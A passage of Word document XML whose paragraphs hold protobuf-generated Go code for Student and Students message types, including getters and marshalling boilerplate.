    <w:p w14:paraId="239B3F0E" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CEC5D1" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) GetAddress() string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887B293" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>if m != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DA8E77" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return m.Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039835A3" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E6FDB" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3925DC88" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A1B2E" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5941ADD8" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Student) GetCn() ClassName {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B7144E" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>if m != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5592D032" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return m.Cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A0286" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4FD241" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return ClassName_class1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1741DFF5" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55397366" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180CEF24" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>type Students struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433EFED0" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Person               []*Student `protobuf:"bytes,1,rep,name=person,proto3" json:"person,omitempty"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C23705" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>School               string     `protobuf:"bytes,2,opt,name=school,proto3" json:"school,omitempty"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC5A344" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>XXX_NoUnkeyedLiteral struct{}   `json:"-"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15497B" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>XXX_unrecognized     []byte     `json:"-"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B0F577" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>XXX_sizecache        int32      `json:"-"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC57A6C" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F650CE" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886EB4B" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Students) Reset()         { *m = Students{} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD6AD8" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Students) String() string { return proto.CompactTextString(m) }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F8CF10" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (*Students) ProtoMessage()    {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C768C" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (*Students) Descriptor() ([]byte, []int) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECCBB9E" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return fileDescriptor_c161fcfdc0c3ff1e, []int{1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F465F4F" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C33B68" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CAD93A" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Students) XXX_Unmarshal(b []byte) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC54BF" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return xxx_messageInfo_Students.Unmarshal(m, b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744BF295" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A63E1C" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Students) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A974F1" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return xxx_messageInfo_Students.Marshal(b, m, deterministic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F800F1" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C48EAA7" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Students) XXX_Merge(src proto.Message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045EDEFD" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>xxx_messageInfo_Students.Merge(m, src)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469D4CFA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9EEE16" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Students) XXX_Size() int {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B207E9C" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return xxx_messageInfo_Students.Size(m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A5FE7C" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4320D6C1" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Students) XXX_DiscardUnknown() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDB7FAE" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>xxx_messageInfo_Students.DiscardUnknown(m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE20AF" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8B7AF" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB93CF" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var xxx_messageInfo_Students proto.InternalMessageInfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715240DE" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F683A" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Students) GetPerson() []*Student {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E6258" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>if m != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222FABC1" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return m.Person</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DCC02A" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C4D5D0" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4B5C23" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A80CF" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCC53B9" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (m *Students) GetSchool() string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB4C7D5" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
